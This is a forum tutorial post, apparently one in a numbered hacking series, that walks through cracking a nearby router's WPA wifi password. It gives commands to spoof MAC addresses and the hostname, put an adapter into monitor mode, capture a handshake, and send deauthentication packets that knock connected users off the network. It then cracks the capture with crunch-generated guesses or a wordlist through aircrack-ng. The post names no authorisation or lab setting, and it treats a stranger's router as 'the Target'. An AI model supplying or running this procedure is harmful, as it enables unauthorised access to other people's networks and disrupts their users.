Learn About Computers

Would you like to react to this message? Create an account in a few clicks or log in to continue.
Learn About Computers

Teaching about Computers


    20. Gain Wpa Wifi Access

    avatar
    Aof
    Admin


    Posts : 97
    Join date : 2018-03-24

    20. Gain Wpa Wifi Access Empty 20. Gain Wpa Wifi Access

    Post by Aof Sat May 26, 2018 2:46 am


    20. Gain wpa wifi access
    ----
    Alfa Networks 1000mW USB Wifi Adapter AWUSO36H v5 Genuine Hologram AWUS036H
    You need to purchase an Internet Adapter with Injection Capabilities in order to follow along with this video,
    This Video is the only video in the series that require this Internet Adapter, so if you are not interested in Hacking Routers (Hacking a router just provides wifi, or gives the ability to prevent users from accessing the Wifi without logging into the Router's Page.) Then I would suggest, just skipping out on buying the Adapter, and skipping this video entirely. I decided to learn it, because I am a knowledge seeker, and found it interesting to learn how hacking router's work also.
    ----
    In this video, I'll be showing you 2 different ways to hack a Router's wifi password.
    Plug in your wifi Alfa internet adapter to your pc before continueing.
    1. ifconfig = view internet interfaces
    2. macchanger -s wlan0 = shows current alfa Mac Address.
    3. service network-manager stop
    4. open the mlist file we've saved earlier, and type up a namebrand of pc, I used Gateway.
    5. macchanger -r wlan0 = change wlan0 to a different unknown mac address.
    6. macchanger -m 00:00:00:00:00:00 wlan0 = use the first 3 digits from your chosen namebrand mac address, and the last 3 digits of the unknown random mac address that was generated.
    7. macchanger -m 00:00:00:00:00:00 eth0 = change eth0 mac address
    8. macchanger -m 00:00:00:00:00:00 lo = change lo mac address
    9. nano /etc/hostname = change hostname here
    10. nano /etc/hosts = change hostname here as well.
    11. service network-manager start = starts network-manager again, then exit the terminal and open it again.
    12. macchanger -s eth0 = check mac address
    13. macchanger -s lo = check mac address
    14. macchanger -s wlan0 = check mac address, usually the wifi mac address is a little harder to fix, proceed with the following steps.
    15. ifconfig wlan0 down = brings the wlan0 interface down
    16. macchanger -m 00:00:00:00:00:00 wlan0 = copy the same mac address as earlier to it, if you forgot what it was, you could always use, "history" command to view your history.
    17. ifconfig wlan0 up = brings the wlan0 interface up again
    18. airmon-ng = to view the wireless interface.
    19. airmon-ng start wlan0 = puts wlan0 interface into monitor mode.
    20. airmon-ng stop wlan0 = stops wlan0 interface so we can kill some processes that may interact negatively with it.
    21. airmon-ng check kill = checks for processes that may interact negatively with it, then kills them.
    22. airodump-ng wlan0mon = Now we can see all of the surrounding routers that are around us, type "Ctrl+c" to cancel the monitoring once you find the router that you are targeting.
    23. airodump-ng -w ESSIDOFROUTER -c CHANNELNUMBER --bbsid 00:00:00:00:00:00 wlan0mon = This will create a file in our /root's home directory as it's monitoring the Router, we need to get a handshake before we cancel this monitoring mode, the bottom mac addresses, are the devices that are connected to it right now.
    Ctrl+shift+t to open a new terminal in another tab.
    24. aireplay-ng --deauth 10 -a 00:00:00:00:00:00 -c 00:00:00:00:00:00 wlan0mon = This will send 10 packets out, and disconnect the client from the Router for about 7 seconds, if they have it set to auto-connect, then when it connects, we'll get the handshake in our other terminal window, if not, you'll have to wait for them to reconnect their device manually.
    Now in the first terminal window, where we are monitoring it, in the upper right corner, you'll see when you have
    a successful wpa handshake. You now have all of the information you need to take the captured file somewhere else and begin working on cracking it.
    25. cd ~/Desktop = navigates to your Desktop
    26. nano Routerinfo = Let's create a nano file on our desktop to copy the info of our the Target's router, as we will need it later during the cracking process.
    27. airmon-ng stop wlan0mon = Now you have everything that you need in order to start the cracking process so if you wanted to, you can type this to place your wifi interface back into station mode, then reset your mac addresses and your hostname to your normal one as we did earlier.

    METHOD 1 CRUNCH: Use if you already know part of the password.
    1. "Ctrl+shift+t" open up a new tab, type "man crunch" to view the manual for the crunch.
    The first crack I'll teach is if you know part of the password, but do not know it all.
    2. crunch 10 10 -t ,nterne@%% abcdefghijklmnopqrstuvwxyz1234567890 | aircrack-ng -w - 'DragRouter'sCapturedfilehere' -e ROUTERESSID = Crunch will now generate all possible combinations of what the password could be with what you gave it to work with, wait for the key to be found and you're done.

    METHOD 2 WORDLIST: Use if you don't know any of the password, but you wish to try many pre-prepared possibilities.
    1. aircrack-ng -w 'INSERTWORDLISTHERE.txt' -b RoutersBSSID 'DRAGROUTERCAPTUREDFILEHERE' = Now it will try every word in your word list, and compare it to what the password captured in the captured file. Whenever it finds a match, it will reveal whic word in your wordlist matches with the Router's Password.

      Current date/time is Mon May 06, 2024 10:12 am